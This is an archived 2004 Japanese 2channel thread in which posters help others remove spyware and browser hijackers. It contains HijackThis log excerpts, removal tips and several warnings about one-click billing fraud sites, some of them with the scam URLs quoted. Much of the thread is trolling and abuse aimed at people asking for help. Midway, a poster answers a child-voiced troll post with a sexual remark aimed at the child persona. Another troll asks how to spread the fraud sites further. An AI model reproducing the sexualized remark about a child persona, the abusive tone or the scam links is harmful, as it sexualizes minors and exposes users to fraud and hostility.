O14 - IERESET.INF: START_PAGE_URL=
http://www.biglobe.ne.jp/ O17 - HKLM\System\CCS\Services\Tcpip\..\{2373F865-DF65-4F37-8370-A4CDF18AEAB0}: NameServer = 218.47.162.1 218.47.162.9
O17 - HKLM\System\CS1\Services\Tcpip\..\{2373F865-DF65-4F37-8370-A4CDF18AEAB0}: NameServer = 218.47.162.1 218.47.162.9
O17 - HKLM\System\CS2\Services\Tcpip\..\{2373F865-DF65-4F37-8370-A4CDF18AEAB0}: NameServer = 218.47.162.1 218.47.162.9
O18 - Protocol: msjwwdat - {BAAB02DC-913E-40AA-B9ED-8068DEE42CFA} - C:\Program Files\Microsoft Office\Home Style\JWW\JWWData.dll
O18 - Filter: text/x-mrml - {C51721BE-858B-4A66-A8BF-D2882FF49820} - C:\Program Files\YAMAHA\MidRadio Player\midradio.ocx
O21 - SSODL: System - {87621A11-9017-48FC-8B10-58210A3C53D6} - C:\WINDOWS\system32\system32.dll (file missing)
>>473-475 Fix指示を出す前に
>O2 - BHO: IDN Helper Object - {118CE65F-5D86-4AEA-A9BD-94F92B89119F} - C:\WINDOWS\Downlo~1\CNSMIN~1.DLL (file missing)
http://higaitaisaku.web.infoseek.co.jp/removecnsmin.html ここを見て、CnsMinを完全に削除しろ。中途半端に削除されてるよ。
テンプレをいい加減に読んでると余計苦労するだけだぜ。
あと、マカフィーとトレンドマイクロが両方入ってる。
McAfeeは最新の定義にできるの?できるならどっちかだけにしろ。
最新の定義にできないなら、McAfeeはアンインストール。
まずこの2つを実行してみて。
(・3・) エェー 正直怪しいのこれぐらい O4 - HKLM\..\Run: [Winad Client] C:\Program Files\Winad Client\Winad.exe
480 :
391 :04/09/02 00:27 ID:???
d直ったよ。
482 :
391 :04/09/02 00:31 ID:???
dd直ったよ。
>>481 お客さん、ちょっと事務所まで来て頂けますか。
誰か、ちゃんとしたお礼書き込んどけよ
有難うございました。 お陰さまで、10年間悩んだ水虫が嘘の様に治りました
486 :
391 :04/09/02 00:50 ID:???
487 :
391 :04/09/02 00:55 ID:???
488 :
391 :04/09/02 00:56 ID:???
>>487 お願いします、本当にそういうのやめてください
490 :
391 :04/09/02 01:02 ID:???
何ですかこれは、知らない私がいっぱい????? 2ちゃんって本当に恐ろしい所ですね・・・・・・・・・・・・・
492 :
ひよこ名無しさん :04/09/02 01:03 ID:HDjUcbeg
win98で変なアイコンがスタートメニューとインジケータ?に入ってしまったのですが アプリケーションの追加と削除を見てもそのファイルが見当たりません。 どうすれば削除できるでしょうか。
さてSP2祭りでもいくか
494 :
391 :04/09/02 01:04 ID:???
ネタじゃないです真剣です。
>>494 ▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
・ E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)
496 :
391 :04/09/02 01:06 ID:???
>>492 横から割り込まないでください、私が質問中ですよ。
498 :
391 :04/09/02 01:08 ID:???
>>495 個人情報が漏れるのが心配ですので許してください。
えっちなホームページみたらちんちんを大きくなってなおらないんですけど、 ボクはどうなっちゃうのでしょうか??たすけてください。
500ゲット
>>492 教えといてやるからな
そこにあるのはレジストリに記載されているアンインストール情報であって、ファイルではない
レジストリのその場所に記憶されている情報を基にして、アンインストールプログラムを起動する
>>499 ちんちんに刺激を与えてやってください。
結果的に元の大きさに戻るでしょう
尚、お猿化しても私は知りません。
>>498 本人なら、
>>391 でID出しているぞ。
ID出さない悪い子は、ネタレスされても諦めろ
どうせ、大方またPC自作板で遁走してきた奴が ここ荒らしてストレス解消してるだけだろ( ´,_ゝ`)プッ
みなさん、私の新作テンプレが完成しましたよ 早くスレを使い切って、新スレで使ってくださいよん。
>>502 なんか白いおしっこのみたいなものがたくさんでたんですけど、
なんでしょうか??ボクは病気なんでしょうか?不安です・・・
おじちゃんおしえてください。
>>510 ど〜れ、おじちゃんが咥えてキレイに舐めてあげようねぇ〜
512 :
391 :04/09/02 01:55 ID:9ChbHYI/
>>512 今更ID出しても騙りなのか本人なのかわからないから誰もアドバイスしないと思うよ。
既に出てるアドバイスでも全部読んでみる事だね。
>>513 ありがとう、あなたもいらっしゃいよ〜♪
総合質問スレで質問したら「スパイウェアチェク」と言われたのでここに来ました。 OS:Xp Home Edition 機種:DELL INSPIRON 5100 ブラウザ:DonutP2.5.2 / Internet Explorer 6.0.2 接続方法:eo64エア(PHS) / DIONダイヤルアップ ブラウザでインターネット上のHPを閲覧しようとすると、 2〜3秒程通信を行った後、プログラムが応答無しの状態になってしまいます ×ボタンを押して終了すると、 「問題が発生したため、Donut (iexplore.exe) を終了します。 ご不便をおかけして申し訳ありません。」のメッセージが表示されます。 「この問題の詳細について参照」をクリックしたときに表示される エラー署名は以下のとおりです AppName: donutp.exe (iexplore.exe) AppVer: 2.5.2.0 (6.0.2800.1106) ModName: wininet.dll ModVer: 6.0.2800.1106 Offset: 000619d0 上記の接続方法のどちらで接続しても同じ状態になります。 オフライン作業を行ったり、ローカル上のhtmlファイルを 開いたりした場合には、正常に動作します。 また、OpenJaneDoe、電信八号(メールソフト)は正常に通信を行います。 原因・対処法等分かりましたら教えていただけないでしょうか
>>517 質問者は、メール欄を空欄にしてIDを出してください。
このスレッドの
>>1-6 を読んで自己努力。
519 :
517 :04/09/02 02:59 ID:SuOLSGCw
ああ、さげてた。ごめんなさい
(・工・)あっそお
感想は日記に書けって言ってるだろ
ここは、俺様の日記だから問題無し
525 :
ひよこ名無しさん :04/09/02 09:52 ID:1gPYuZYD
about:blank、search forのページ。 右クリックしても何も反応せんようになったんやけど…
527 :
ひよこ名無しさん :04/09/02 10:08 ID:1gPYuZYD
>>526 あ、本当だった。
アホな質問してスマソ
about:blank Search forようやく治った テンプレサイト見るとabout:blankとSearch for型は別の対処やってるけど 自分の場合はSearch forの対処やった後にCoolWebShredder実行してようやく完治
529 :
ひよこ名無しさん :04/09/02 19:43 ID:G+v6LyeO
実家のPCが複数のスパイウェアにかかってたので、いろいろやってみました。 spybot,ad-awareでいろいろと削除したあと、 調子悪くなったという日付あたり以後に作成されたexeファイルを検索して 怪しいものは全部消してみました。 それで当初の症状(立ち上げた状態でフリーズ、about:blankなど)はなくなったのですが IEの右下に「信頼済みサイト」のアイコンが出て治りません。 オプションからサイトリストは削除したのですが。 それにエクスプロアラーの調子もおかしいようで、フォルダを開いてもアイコンを表示しない設定になっています。 「表示」の設定が”webページ”にチェックが入ったままの状態です。 元の状態へ戻す方法をご教授ねがいます。 それと、タスクマネージャをみたところ、 intarnat aptezbp loadqm systray imejp98m ahnsd iexplore 以上のものが動いているのですが、問題あるものはないでしょうか? OSは98SE、IE使用でセキュリティ関係のソフトは入っておりません
>>529 テンプレやってからにしろ
それからじゃないと見てやらない
>>529 調子悪くなったのが何時か分かるなら、システムの復旧しろ
>>531 × システムの復旧
○ システムの復元
■システムの復元(レジストリーを感染以前に戻す)
Windows98は現在手元に無いので、設定方法をWebから探してきた
●Windowsを再起動して「Ctrl」ボタンを押下したままにして
「スタートアップメニュー」を表示させます。
●メニューより「Safe mode command prompt only」を指定し
て「MS-DOS」を起動します。
●右記のコマンドを実行します。C:\>Scanreg /restore
●正常起動のバックアップが表示されますので感染以前の物を
選ぶだけでその時点に戻ることが出来ます。
↑これは何なの?
>>534 リンク先見ればわかるけど、アンラボV3ウィルスブロックのアップデーター。
アンチウィルスソフト入ってるんじゃねーのかな?
アンラボV3ウィルスブロック・・・・・・かっこいい名前っすね〜
537 :
529 :04/09/02 20:39 ID:???
>>531-532 ありがとうございます。
システムの復元が98でもできるとは知りませんでした。
>>533 入ってるみたいですね。
実家のPCなんで俺は基本的にノータッチだから認識違いをしてました。
すみません。
うむ。
540 :
538 :04/09/02 21:02 ID:???
>>538 で終わらせたら、このスレの話題から反れてるね。ごめん。
最新の定義にアップデートしたら、V3でウィルススキャンかけてみな。
もしかしたら、単純にウィルスが入り込んでるだけかもしれない。
最新の定義に何かの事情でできないなら、
>>3 のオンラインスキャンを試してみる。
テンプレ全部やっても治らないなら、
>>5 やってここにログを貼れば見る。
>>537 システムの復元じゃないよ
バックアップしてあるレジストリの復元
当然悪玉ファイルは残ったままだから、ダブルクリックしたら不具合起こるよ
542 :
ひよこ名無しさん :04/09/02 21:40 ID:SKBOMAiD
Ad-Aware SE Personalでスキャンしてでてきた 重要なオブジェクトってのはウィルスとかのことなんですか?
>>540 V3とやらを探してみたのですが見当たりません。
スタート→プログラムにないんですよ。
タスクが動いてるのに…
>>541 うーん、俺の理解力を超えつつあります。
>バックアップしてあるレジストリの復元
改変されたレジストリを以前の状態に戻すってことですよね。
全ての悪玉を修正、削除したあとでレジストリを復元しても悪者は復帰してくるんでしょうか?
だったら無限ループに陥りませんか?
>>543 一番手っ取り早いのは、そのPC使ってる人にアンチウィルスソフト入れた?って聞く事だろうね。
もしかしたら以前入れてて、アンインストールした後の残りカスなのかもしれないし。
(だとしたらそれも修復しなきゃいけないわけだしね)
言っている内容は要するに、最新の定義にできるV3があるならV3でスキャン、
V3でスキャンできないなら
>>3 のオンラインスキャンしろ、ってだけだよ。質問するのはその後。
546 :
529 :04/09/02 22:04 ID:???
>>545 わかりました。
スキャンともう一度テンプレを試したらまた来ます。
547 :
529 :04/09/02 22:04 ID:???
>>545 わかりました。
スキャンともう一度テンプレを試したらまた来ます。
548 :
529 :04/09/02 22:05 ID:Mm6ksZHI
>>545 わかりました。
スキャンともう一度テンプレを試したらまた来ます。
>>545 わかりました。
スキャンともう一度テンプレを試したらまた来ます。
550 :
529 :04/09/02 22:05 ID:???
>>545 わかりました。
スキャンともう一度テンプレを試したらまた来ます。
551 :
529 :04/09/02 22:06 ID:???
>>545 わかりました。
スキャンともう一度テンプレを試したらまた来ます。
553 :
391 :04/09/02 22:11 ID:FIYeGomb
アダルトサイト被害対策で質問することになったのでこちらの質問は終了します。 ありがとうございました
>>553 貴方の選択は正しい、それでも
向こうで、門前払い喰らったら帰って来いよ
>>555 貞は、真面目過ぎるけど回答者としてはポイントを突いた
的確な対応していたぞ。
真面目すぎて、ここには向かないキャラだけどな
>>552 >これはウィルスやスパイウェアにも言えます。つまり、自動起動やブラウザへの仕込みなどの
「仕掛け」は解除されますが多くの場合本体のプログラムはそのままHDに残ります。
これはもう、訂正してあるだろうよ
いつまでも攻めるなや
MeとXPのシステムの復元は、ファイルの監視までしている
まぁ何でもいいやw
562 :
ひよこ名無しさん :04/09/02 22:36 ID:tsKF9jLq
何度駆除しても以下の3つのスパイウェアが検出され、 完全に駆除することができません。 VX2/f 3entries Dialer.Xpehbam.biz 5entries DSO Exploit 2entries OSはWin2K(SP4),ブラウザはIE6.0,セキュリティソフトは無です。 どうすればこれらのスパイウェアを駆除できるかわかる方お願いします。
>>562 何でセーフモードでやれって書いてあるのにやらねえんだ!
>>562 DSO ExploitはSpybotのバグだから無視。
その他はセーフモードで実行しても消えないなら、ウィルスを疑った方がいい。
565 :
562 :04/09/02 22:40 ID:tsKF9jLq
>>563 セーフモードでのSpybotも行っています。
>>565 >セキュリティソフトは無です。
これの意味がよくわからんのだが。アンチウィルスソフトがないって事かい?
先にアンチウィルスソフトを使ってスキャンか、オンラインスキャンで駆除しないと意味ないよ。
実家の父親が「about:blank Search for」にかかりやがった…。 とりあえずSpybotをメールで送り、午後から今までずっと電話で説明。 4年以上前のPCだから何をするにも時間がかかり、 結局駆除の続きは明日やることに。 タスケテー(´Д`;)
>>569 回答は俺の千本ノックを受けてからだ!!!準備はいいか?
>>569 データを退避出来るなら、再インストールが早いけど
たぶん無理なんだろうな。
about:blank Search for… は手強いけど
親孝行だと思って、がんばれ
>>571 個人識別コード
あなたのプロバイダは あほー BB です。
個人識別コード 1094136210 を登録いたしました。
個人識別コードはPC個別に割り当てられている
☆個人情報を特定可能な☆★次世代コード★です。
ご利用期間60日間 料金\15,000
ネットやっていると定期的にエロでも何でもない普通のサイトの リンクが勝手に開くんですけど対処法はどうすればいいんでしょうか…?
>>575 回答は俺の千本ノックを受けてからだ!!!準備はいいか?
>>576 はい!お願いしますコーチ!
ようするに出直して来いってことですね…
もう少し自分で対処法探しますです
▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
・ E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)
・ 2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。
・ 他のスレから誘導された場合は、その旨書く。(マルチポストとの区別)
・ OSの種類、ブラウザ、セキュ関係ソフトの有無、実行結果を報告。(特にOSの種類)
・ まず、テンプレサイト(
http://haiiro.info/my/text/template.html )を必ず読む。
▼━禁止事項 ━━━━━━━━━━━━━━━━━━━
・ マルチポスト(複数の板・スレで同じことを質問)
・ 情報の小出し(始めにOSやソフト名等を必ず明示)
・ 違法な話題や質問(WinMX,Winny,エミュレータ等)
・ 天麩羅屋 & 薮パソユーザーは立ち入り禁止。HNを変えてもダメです。
・ Opera房立ち入り禁止。HNを変えてもダメです。またその話題も違法です。
>>578 そのサイトはおまいが作ったのか?読みづらいよ?
>>579 俺じゃない、誘導すると必ず言われるんだよねw
581 :
ひよこ名無しさん :04/09/03 12:21 ID:otuDGD1Y
>>581 ま た 次 世 代 コ ー ド か !
584 :
581 :04/09/03 12:26 ID:otuDGD1Y
既出でしたね、すみません。
585 :
ひよこ名無しさん :04/09/03 12:31 ID:IA5NG1BL
2chに貼ってあったのを見た瞬間に登録されたみたいでご利用期間は60日で15000円です。 個体識別番号を元に住所、氏名、電話番号をお調べし当番組管理部より延滞料金30000万円、延滞一日につき1000円の損害金を加算してご自宅、ご実家、勤務先に直接請求される事があります と出てきたのですが もうどうしようもありませんか?
>>585 www.cat-e.be/member/index.php
ですね。既出です。無視する。釣りですか。
588 :
ひよこ名無しさん :04/09/03 12:39 ID:IA5NG1BL
>>587 そうです。既出なんですか?本当にすいません。こういうの初めてなんで少しあせっているんです
田代砲やったサイトか
591 :
590 :04/09/03 13:26 ID:???
592 :
753 :04/09/03 13:35 ID:???
\ ∩─ー、 ==== \/ ● 、_ `ヽ ====== / \( ● ● |つ | X_入__ノ ミ 、 (_/ ノ /⌒l /\___ノ゙_/ / ===== 〈 __ノ ==== \ \_ \ \___) \ ====== (´⌒ \ ___ \__ (´⌒;;(´⌒;; \___)___)(´;;⌒ (´⌒;; ズザザザ
593 :
ひよこ名無しさん :04/09/03 13:42 ID:zDlrf3xv
about:blank Search for型に感染しているようなのですが、ソースを見てもエンコードされた文字列の部分がありません。Ctrl+fで検索もしました。 亜種ということなのでしょうか?
>>593 about:blank Search for… に感染したという症状は?
只のSearch for…じゃないの
>>593 「About:blank Search for...に違いない!」と思いこんで他のテンプレ全くやってないに一票。
ここはネタスレだからOK牧場。
597 :
ひよこ名無しさん :04/09/03 13:56 ID:zDlrf3xv
ホームのアドレスがabout:brankになって、Home Searchというページが表示されてしまいます。 このHome Searchの時点で別種なのでしょうか?
>>593 >>597 「個別のスパイウェアの駆除方法」ってのは、アンチウィルスソフトが入っていて、
アンチスパイウェアソフト3種を全部やっても治らない人用に書いてあるから、
テンプレの他の内容もやらずにいきなりやっても無意味だよ、っと。
テンプレ貼らないで、除去ウィザードだけにした方がいいかもしんないね。
>>601 昨晩、相談して今日の昼過ぎまで放置か
それもここの住人にチクられているね。
ここで回答したけど無視された回答者かな
自業自得といえば、そうなんだろうけど
もう本家で回答してくれる奴は居ないだろうな。
>>602 こっちのスレを覗いてる向こうの回答者多いからなw
向こうで放置されてる理由ってのはチクった奴が指摘した内容でしょ。
>>601 通りすがりの2chねらーってorz
すごいでじゃばりな性格だな・・・
>>604 書かなくても、指摘されるだろ
基本的な部分だから。
それにしても、夏休みが終わったら
お客さん減ったね
言いたくなる気持ちはよーくわかる。典型的な人の話を聞いてないマルチデブだからなー。 ざ ま あ み ろ
一つだけ評価出来るのは、マルチせずにここに断りを入れて行った事だけか ここが見た目にネタスレ化しているのが、悪いんだろうけど、良くスレを読めば 好き嫌いせずに、まともに回答している事に気が付くのにな。
>>608 個人識別コード 1094192405 を登録いたしました
ゝ( ゚∀゚)メ(゚∀゚ )ノ アヒャヒャヒャ という訳で気にするな、と。
激しく既出だよそこも。
610 :
609 :04/09/03 15:37 ID:???
よく見たら、振りこみ先が変更してるな。 VIPのスレと喪男のスレに貼ってみるか(・∀・)ニヤニヤ
>>601 O4 - HKLM\..\Run: [Winad Client] C:\Program Files\Winad Client\Winad.exe
よく見ると上のが消えてる。一応は治そうとはしているみたいだな・・・。
後は、
O20 - AppInit_DLLs: AppInit_DLLs=""
O21 - SSODL: System - {87621A11-9017-48FC-8B10-58210A3C53D6} - C:\WINDOWS\system32\system32.dll (file missing)
この2つの問題さえ解決すれば一応解決か?
CnsMinは削除推奨だが確か本家でも一応は自己判断だし。
>>611 それ、両方とも駆除した後の残りカスだと思うぞ。
ADW_SOLU180.B、SPYW_AGENT.A
両方とも検索してみたが、どうやら詳細不明のダウンローダーらしいから、
俺はビックローブツールバーがCnsMinをダウンロードしようとしているのを
検出しているんじゃねーかな?と予想。
>609さん有難うございまし でも既出なんだ、知らなかった。
615 :
725 :04/09/03 18:26 ID:Q4dtQVti
saerch forを解除する為に問題のaboutblankのソースがいるのですが、右クリックを してもそのページでは何もでないのでデコード出来ません。どうしたらよい でしょうか?結局sarch forを解除したいのです。osはxpです。宜しくお願いします。
>>615 それは、本当にabout:blankなの?もしかしたら単なる思いこみじゃないの?
他のテンプレも全部やってみた?
>>615 右クリックしたまま左クリック。そして右だけ指を離す。( ゚Д゚)ウマー
通りすがりの2chねらさん、降臨キボンヌ
619 :
ひよこ名無しさん :04/09/03 20:03 ID:2tCXsrCc
質問なんですけど一番最初(クリックして最初)に出てくるホームページがありますよね?
そのホームページを変更しようとしても変更できないんですけど。
既にツール→インターネットオプションで直そうと試みましたが直りませんでした。
ちなみにこのHPから直りません
http://gcverj.outhost.info/あ 自分パソコン初心者なので
>>2 の意味すら分かりません・・・
どうか放置せずに答えてくれるとありがたいです。
620 :
ひよこ名無しさん :04/09/03 20:15 ID:H7S877K/
完全にネタスレになったな ヒャヒャヒャ
斬新な新ネタキボンヌ。
624 :
ひよこ名無しさん :04/09/03 20:33 ID:H7S877K/
いや、マジレスお願いします
>>627 クリックしたけど、カネなんか払わねーよ。払う気なし。
>>627 踏んでみると、
「ご登録ありがとうございます。あなたは大人の出会いに登録されました。
お客様の個人識別コードは52100034847
個人認識コードはPC個別に割り当てられている個人情報を特定可能なコードです。
解約希望の方はENTERから解約手続きを行ってください。
解約手続きを行わないと利用料金が発生します。
利用されない方は必ず解約手続きを行ってください。」
だそうだ。
間抜け、というか、出来損ないの騙しサイト。
ENTERを踏むと、大人の出会いランキングサイトに飛ぶ。
/| | |_____ΦΦΦΦΦΦΦΦΦΦΦ||ΦΦΦ | | | ̄ ̄ ̄ /| || | | | / /|TTTTTT TTTTTTTTTT||TTTTT | /\ | /|/|/|^^^^^^ |三三| ^^^^^^^^^^^||^^^^^^^ | / / |// / /| | / / |_|/|/|/|/| | / / |文|/ // / |/ /. _.| ̄|/|/|/ Λ_Λ /|\/ / / |/ / (___) よく分からんが祭りダー!! /| / / /ヽ /〔 祭 〕〕つ | | ̄| | |ヽ/l `/二二ヽ | | |/| |__|/ Λ_Λ / /(_) | |/| |/ ( ´∀`) (_) Λ_Λ | | |/ // / ^ ̄]゚ (` ) | |/ ゚/ ̄ ̄_ヽ ⊂〔〔 祭 〕 | / /_ノ(_) ┌|___| |/ (__) (_ノ ヽ ヽ / (_)
633 :
627 :04/09/03 22:48 ID:???
皆さんクリックしないでと言ったのに…。
でもそこまでしていただいてありがとうございました!
>>628 ありがとうございました、ずっと悩んでたのでその一言で救われました。
>>629 業者には捕まらないように気をつけます。ありがとうございました!
>>631 全く同じ内容が書いてありました。
騙しサイトだったのですか…。
自分がENTERを踏んだら何も表示されなかったのですが…。
わざわざ調べてくれてありがとうございました!
個人認識コードとか書いてあって怖かったです。
皆さん本当にありがとうございました!
ぬるぽ大好き
635 :
ひよこ名無しさん :04/09/04 00:02 ID:O41Y/FV6
なんか最近zipファイルを左クリックで保存できなくなってしまったんですけど どうするんでしたっけ? 以前同じことになった時は自分でzipの設定を見つけて直した気がするのですが…
638 :
ひよこ名無しさん :04/09/04 00:09 ID:O41Y/FV6
書き忘れていました。ちなみにXPです。
>>637 読み直してきます。
640 :
ひよこ名無しさん :04/09/04 00:59 ID:wy843cKn
ttp://moreporn.biz/new/index.php このサイトに飛んでヤバイと思ってすぐ消したんですがその後sexっていうショートカットが出てくるわ。
ネットにつなげててしばらくしたらAlready running!OKって勝手にブラウザ開くし。
soybotっていうスパイウェア駆除ソフト使ってもこれは削除できませんでした。
どうしたらいいですか?助けてください。
>>640 Spybot以外のテンプレを実行してみよう。
>>640 Spybotは買わないとサポートが受けられなくてなおる見込みがないから
まずは購入して下さい。
よーし。Spybot買っちゃうぞおー
646 :
◆tfD4fDHpTQ :04/09/04 04:30 ID:2g8oD79I
chmファイルは全て削除しても大丈夫でしょうか?? テンプレ実行中のものです。
spybotでチェック入れて削除しようとしても、Cns Minというのだけが 「メモリーの上にあるので削除できません」と表示されてしまうのですが… 再起動してくださいと出るので再起動するのですが、それでも 同じく「メモリーの上・・・」という表示が出て削除できません。 どうしたらよいでしょうか・・・ 教えてくんでもうしわけないです。
>>647 Jword、Biglobeツールバーとかなら
サイトに行けばアンインストール方法がある。
650 :
251 :04/09/04 10:36 ID:VngTyYZL
652 :
650 :04/09/04 10:50 ID:VngTyYZL
653 :
646 :04/09/04 11:28 ID:2g8oD79I
よろしくお願いします。
>>653 テンプレにそんな事書いて有ったか?
CHMはHELPファイルの拡張子だから、HELPを使わないなら
削除しても構わないが、それ以前に必要以上のファイルを削除
する事は、お勧めできません
660 :
ひよこ名無しさん :04/09/04 13:50 ID:pkZPi8rz
CoolWebSearchの日本語化はできないのでしょうか? 宜しくお願いします。
661 :
ひよこ名無しさん :04/09/04 14:11 ID:zMOUyCOg
>>660 CWShredderの事か?
あんな簡単なもん、日本語しなくても辞書引きながらで使えないか?
665 :
661 :04/09/04 15:41 ID:zMOUyCOg
みんな冷たいですね・・・ 自力でやったら何とか正常に戻った気がするんですが、まだ勝手に他のページに飛んだりもします(えろサイト) どうすればいいでしょう?
>>665 テンプレの他に何を言って欲しいのかわからんが、
助けに行くから住所おしえてくれ。
667 :
ひよこ名無しさん :04/09/04 15:49 ID:qlQjN4uj
>>667 払わなくていい
少なくても俺は困らない。
>>667 (・3・) エェー ま た 次 世 代 コ ー ド か YO! 詐欺だからほっとけYO
671 :
ひよこ名無しさん :04/09/04 15:52 ID:qlQjN4uj
次世代コードはマカーも認識するのかな?
>>665 PCの電源を切って、廃棄物業者に電話して、廃棄
これですっきり、間違いない!
罵倒されたいヤツは何時でもおいで。
次世代コードスレッドでも詐欺・防犯板に立てたほうがいいのかな? それともネトヲチ向けかな?
677 :
ひよこ名無しさん :04/09/04 16:50 ID:DmeWlkwO
ann
678 :
ひよこ名無しさん :04/09/04 17:31 ID:0P1ExdrH
NGWord推奨 : member/index.php
通りすがりの2chねらーさん出番ですよ。
>>681 「田代砲対策について教えてください 投稿者/ わるふ 」
完全に投稿先を間違っているな、マジだとしたら
www.cat-e.be の奴か
どちらにしても、本家も大変だな
>>684 しないだろ
馬鹿を相手にしても何のメリットも無いし
686 :
ひよこ名無しさん :04/09/04 19:44 ID:LlP2w6mQ
インターネットを立ち上げようとするとDailyToolbarだのFWNToolBarだのSeachBarが出てきて立ち上がらなくなってしまいました。 初期化しか道はないのでしょうか?
>>686 テンプレやりたくないなら、初期化しかないんじゃねーのかな
>>686 インターネットを立ち上げるスキルとお金が有るなら
こんな所に相談に来なくてもw
>>686 ツールバーはひとつあればいいんじゃないか
ぐへへへへへへへ、今夜も大漁だぜw
すいません、
>>678 をうっかり踏んじゃったんですが
コレってほっておくと不味いですか?
どれがそうなのか分からないけど、よかったね。
本家も次世代コードで・・・モウダメポ。・゚・(ノД`)・゚・。
>>692 カネが余ってるから俺が代わりに払ってやるよ。
>>698 そんじゃ、俺のソープ代もお願いします。
ソープなんか行ってる奴は芋。
702 :
ひよこ名無しさん :04/09/04 22:58 ID:lYz9lC1C
OSはXPです。今は別のPCで書き込んでます。 多分弟がエロサイト見てたんだと思いますが、そのせいでPCがおかしくなってしまいました。 起動させた時にショートカットアイコンで「Hardcore TEEN SEX」とでて、必ずエロサイトが起動してしまいます。 しかも、コントロールパネル開いたりゴミ箱開いたりすると、固まって青い画面になります。メモリ不足ですみたいなのがでるのですが・・・ 対処法教えてください。
>>699 支払いの依頼か?
依頼するんならID出せ
そしてテンプレ読んで実行
そして窓の手使え
>>702 起動して直ぐに、エロサイトですか
実用的で良いな。
俺達自慢のテンプレを、たっぷり味わってくれ!
>>705 スマソ。書き忘れましたが、CoolWebShredder・Ad-Aware・Spybot-S&D
をインストールさせたのですが、使い方がわかりません。
>>708 まだまだ、だな
今日はこの辺で、許してやろうか
>>708 ( ゚д゚)ポカーン
質問者が「解決済み!」ってやってるパターン初めて見たよ
質問者は相当なドキュソだな
というか質問者をきっちり説得できないようでは回答者失格では・・・ 結果的にはCneMin残ったままだし なにこの結末
最近の本家も大変だ
べろべろばー うほほほほ おチンチンびろーん ∩___∩ ∩___∩ | ノ ○─○ヽ_∩__∩ にひゃひゃひゃひゃひゃ | ノ ヽ/⌒) / /3 3 | ヽ /⌒) (゚) (゚) | .| | ( _●_) |o⌒ ⌒o| / / ( _●_) ミ/∩―−、 |∪| /⌒(_●_)⌒ ミ .( ヽ |∪| / / (゚) 、_ `ヽ ヽノ | |∪| / \ ヽノ / / ( ● (゚) |つ ∩. ヽノ∩ / / | /(入__ノ ミ | ノ⌒ ⌒ヽ | _つ / 、 (_/ ノ / (。)(゚)| | /UJ\ \ \___ ノ゙ ─ー| (⌒_●⌒)ミ | / ) ) \ _彡、/ |U UU_/ ∪ ( \ \ \ | | || \_) あびゃばばばだーん . .| |nn _nn|| ぐへへへへへへ \___)
>>713 このスレに、その馬鹿が来た時のログを見てみろ
当初から指摘されているにも関わらず、そいつは
無視を続けているよ、そして本家に相談
まともな質問者じゃ無い奴に回答するだけでも
有り難く思えよ
暇人回答者の集まりだな そんなに暇か?
>>716 お前みたいのがいるとスレがダメになる。消えろ
暇人ではなく廃人ですよ。
>>719 スレが駄目になる?
スレは駄目にならないだろ
お前、頭大丈夫か?
本家に相談して来い
馬鹿の集まり。
眠、相変わらず偉そうだな
725 :
ひよこ名無しさん :04/09/04 23:30 ID:8QBYlCYu
すいませんテンプレのサイトに行ったんですが、字が小さくて潰れてるので何が書かれてるのか解らないか所がいくつかありました。 字を大きくしたりとかできるんでしょうか?
いいぞ〜!!どんどん本家を紹介して、ここをぶっ潰せ〜w
>>725 フォントだけなら、表示→文字サイズで大きく設定
画像も込みなら、
画面のプロパティで画面の領域を小さくする(液晶は滲むので不可)
>>729 今の状態だと容量の少ない、本家が潰れるぞ
リモホ取られているからネタでもちゃんとしたネーム以外では回答できんよ やってること怖すぎwww
おう、何でもいいから質問しろや
「いいから早く回答してやれw 」←wなんて使うなヴォケ
エロサイトに限らずWEBを見て回ってたらブラウザ乗っ取られて大変なことに…
いったいどうしたらいいの?って人のためのスレッドです。
▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
・ E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)
・ 2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。
・ 他のスレから誘導された場合は、その旨書く。(マルチポストとの区別)
・ OSの種類、ブラウザ、セキュ関係ソフトの有無、実行結果を報告。(特にOSの種類)
・ まず、テンプレサイト(
http://haiiro.info/my/text/template.html )を必ず読む。
・ テンプレサイトの補足(
>>2-10 あたり)を必ず読む。
▼━回答者の方へ ━━━━━━━━━━━━━━━━━━━━
・ テンプレの方法を実行せずに質問する人は、徹底放置して下さい。
・ 出された指示を実行せずにレスする人は、徹底放置して下さい。
・ HijackThisの分析から嘘が判明した場合は、徹底放置して下さい。
・ 放置ができない回答者は、質問者が自作自演していると見なされます。
▼━禁止事項 ━━━━━━━━━━━━━━━━━━━
・ マルチポスト(複数の板・スレで同じことを質問)
・ 情報の小出し(始めにOSやソフト名等を必ず明示)
・ 違法な話題や質問(WinMX,Winny,エミュレータ等)
・ 天麩羅屋 & 薮パソユーザーは立ち入り禁止。HNを変えてもダメです。
・ Opera房立ち入り禁止。HNを変えてもダメです。またその話題も違法です。
>>742 スパイウエアは何を食べますか?
おじちゃん教えて下さい。
>>743 (・3・) アルェー 馬鹿、とは何事だこの野郎カチンときたYO
業者・・・・・・・・・
ネタスレage
そろそろ、寸劇は終わりにして質問者を待ちますか
業者としたら来んな
ネタ質問、ネタ回答はここでどうぞ。
架空請求サイトを更に広めるにはどうしたらいいのですか?回答者のクズども
>>762 そんなに広めたかったらマスコミ系の掲示板にでも貼れば
全国的に広まるよ、犯罪サイトとしてね
罵倒してほしい初心者、質問を受け付けています。 いかに騙されるか、或いは、いかに回答者群を騙すか、腕の見せ所だな
ぐへへへへへへへへ、獲物はまだかぁ〜
768 :
699 :04/09/04 23:57 ID:???
そんなことよりも俺のソープ代を払ってくれ
769 :
699 :04/09/04 23:57 ID:???
俺のソープ代が先です
770 :
699 :04/09/04 23:58 ID:???
771 :
699 :04/09/04 23:58 ID:???
誰かお尻かしてぇ〜ん
772 :
699 :04/09/04 23:59 ID:???
俺が699だよ
何人いるんだ? 横一列になって番号言え
774 :
699 :04/09/05 00:00 ID:???
ふっ・・・人気者は辛いな。
775 :
699 :04/09/05 00:02 ID:???
>>766 スパイウエアの被害における、経済的損失額を
最新の情報を入れて分かり易く説明してください
取りあえず、俺のソープ代も払ってね
このスレ凄いな・・・・
